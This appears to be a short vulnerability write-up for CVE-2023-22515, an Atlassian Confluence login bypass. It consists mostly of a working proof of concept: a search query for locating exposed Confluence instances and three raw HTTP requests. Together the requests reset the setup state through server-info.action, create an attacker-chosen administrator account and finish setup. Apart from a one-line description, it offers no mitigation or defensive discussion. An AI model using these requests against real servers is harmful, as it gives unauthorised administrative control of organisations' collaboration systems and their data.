Atlassian Confluence Server Info Action Login Bypass Vulnerability Cve 2023 22515
Atlassian Confluence Server Info Action Login Bypass Vulnerability Cve 2023 22515
Atlassian Confluence server-info.action Login bypass vulnerability CVE-2023-22515
Vulnerability Description
Atlassian Confluence is a software developed by Atlassian that is built on the collaboration software of the network.
Vulnerability Impact
Atlassian Confluence
Network surveying and mapping
app=”ATLASSIAN-Confluence”
Vulnerability reappears
Login page
Verify POC
1
2
3
4
5
6
7
GET /server-info.action?bootstrapStatusProvider.applicationConfig.setupComplete=false HTTP/1.1
Host:
Accept: */*
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
1
2
3
4
5
6
7
8
9
10
POST /setup/setupadministrator.action HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
Content-Length: 126
username=bbvpe4mk&fullName=bbvpe4mk&email=bbvpe4mk@localhost&password=6wg6pm6sP123&confirm=6wg6pm6sP123&setup-next-button=Next
1
2
3
4
5
6
7
GET /setup/finishsetup.action HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded
X-Atlassian-Token: no-check
Accept-Encoding: gzip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36
Accept: */*
This post is licensed under CC BY 4.0 by the author.